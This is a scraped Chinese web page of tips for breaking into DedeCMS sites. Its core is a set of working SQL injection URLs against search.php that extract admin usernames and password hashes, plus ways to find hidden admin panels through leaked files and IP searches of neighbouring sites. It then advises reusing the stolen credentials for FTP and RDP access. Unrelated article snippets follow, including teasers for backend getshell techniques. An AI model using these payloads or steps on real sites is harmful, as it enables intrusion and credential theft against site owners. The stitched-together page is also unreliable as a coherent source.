dedecms站 找后台的一些经验

首先:

注入exp

有时候 有些 /plus/目录换成了 /plugins目录

/plugins/search.php?keyword=as&typeArr[111%[email protected]`\‘`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%[email protected]__admin`%[email protected]`\‘`+]=a

/plus/search.php?keyword=as&typeArr[111%[email protected]`\‘`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%[email protected]__admin`%[email protected]`\‘`+]=a

/plus/search.php?keyword=as&typeArr[111%[email protected]`\‘`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%[email protected]__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%[email protected]`\‘`+]=a

/plus/search.php?keyword=as&typeArr[ uNion ]=a

/robots.txt

/data/admin/ver.txt

/data/mysql_error_trace.inc

第一 个看这里 /data/mysql_error_trace.inc 爆出来补

第二 个  域名作为后台 或者域名变形一下

第三 个 先ping域名 获得ip地址 之后

http://www.bing.com/

搜索 ip:127.0.0.1  php 有可能获得后台 也可以获得其他旁注站 一般dedecms的旁站很多也是dedecms 的

第四 个  查看 robots.txt

http://www.dedecms.com/robots.txt  查看旁注站dedecms的站  再去社工目标站的后台地址也可以

第五 个  注入exp得到账号 去社工 ftp 和 3389密码

时间: 2024-12-16 06:25:19

dedecms站 找后台的一些经验的相关文章

读DEDECMS找后台目录有感

本文作者:红日安全团队--Mochazz 早上看了先知论坛的这篇文章:解决DEDECMS历史难题–找后台目录 不得不说作者思路确实巧妙,作者巧妙的利用了Windows FindFirstFile和织梦程序代码中对上传图片的逻辑判断,成功在Windows环境下爆破出后台目录.可能一些人不了解Windows FindFirstFile,其实就是Windows在搜索文件时,使用到的一个winapi 函数,有时候我们找不到自己上传的马时,也可以利用它,请阅读下面一段解释: 目前大多数程序都会对上传的文件

去除DedeCms 5.7后台版权广告链接的方法

织梦DedeCms 5.7后台有很多的织梦官方的广告链接,下面我们来将这些广告去掉吧. 一.去处后台登陆页login.php广告链. 1.找到登录界面模板文件/dede/templets/login.html,在里面找到广告部分代码如下: <div class="dede-iframe"> <iframe name="loginad" src="login.php?dopost=showad" frameborder="

程序员找工作的干货经验

一起来学学大师兄的找工作经验吧! 注:文末有福利! 忽然间想到如果要找工作的话,需要注意一些什么问题. 没毕业的,刚刚毕业的,刚刚工作的都可以借鉴一下. 大师兄结合自身经历,经验,稍微总结下.保存下来,以备后来者-------自己或观众使用.想当初刚刚毕业,或者说 ,还没毕业的时候,跟着班里的同学们组队到成都去找工作实习,也就是几天前的事的感觉,但是现在,大家都各奔东西,各自忙自己的,有的现在还在成都工作呢,有的已经离开啦,有的干脆就转行啦,不干这一行啦.想想当初我们一起面试的经历,也挺好笑的.

Dedecms V5.7后台的两处getshell

在这个帖子里我把两个洞一起写出来. 第一个是常见的思路,把语句写入inc文件,然后在其他的include语句中,包含了恶意代码进而getshell.漏洞代码在:/dede/sys_verifies.php 代码如下: else if ($action == 'getfiles') { if(!isset($refiles)) { ShowMsg("你没进行任何操作!","sys_verifies.php"); exit(); } $cacheFiles = DEDE

DEDEcms 织梦后台去除去掉左侧系统帮助版权方法

找到后台目录dede\inc\inc_menu.php 把下面这句的makeremote_all.php 这个链接修改掉即可. $remoteMenu = ($cfg_remote_site=='Y')? "<m:item name='远程服务器同步' link='makeremote_all.php' rank='sys_ArcBatch' target='main' />" : "";

dedecms织梦后台友情链接LOGO显示图片BUG

由于去除跨站XSS的干扰,在添加LOGO类型的友链时,LOGO图片的存放地址flink在特殊范围内"li<x>nk",从而无法正常显示LOGO,所以我们需要修改一下logo. dede/friendlink_add.php $imgurl = $cfg_medias_dir."/flink"; 改成 $imgurl = $cfg_medias_dir."/friend"; dede/friendlink_edit.php $reque

dedecms织梦后台发布文章提示“标题不能为空”的解决办法

V5.7登录后台后,发布英文标题没问题,发布中文会提示“标题不能为空”. 原因:htmlspecialchars在php5.4默认为utf8编码,gbk编码字符串经 htmlspecialchars 转义后的中文字符串为空,也就是标题为空. 解决办法:给htmlspecialchars添加ENT_COMPAT ,'GB2312'参数修改编码默认值. 具体修改页面: 1.dede/article_add.php 和 dede/article_edit.php将$title = htmlspecia

dedecms织梦后台password忘记了怎么办?dedecms织梦后台password忘记怎样找回password?

方法一:自己用解密的方式 用phpmyadmin登陆后台数据库,查看 找到password:去除前三位和后一位,然后拷贝到http://www.cmd5.com/在线解密工具里面解密 watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvYTEwNzk1NDA5NDU=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center" > 方法二.自己设定已经知道的passw

习科小D整理找网站后台办法[科普]

习科科普贴,如何找到网站的后台 作者:小Dの马甲来自:习科论坛 - Silic.Org - BlackBap.Org 1, 穷举猜解    现如今可以暴力猜解网站后台登陆地址的软件有很多,从最早的啊D注入工具开始,一直到现在很多常用的工具(通常为SQL注入利用工具)都会带有后台登陆地址猜解的功能.    当然了,这个猜解绝大部分是根据字典来的,只要字典强大,用哪个工具猜倒显得不是那么重要了.需要注意的是,要看工具猜解路径的运用原理,大部分是根据返回的头部的代码,如200,404等等,这里要特别注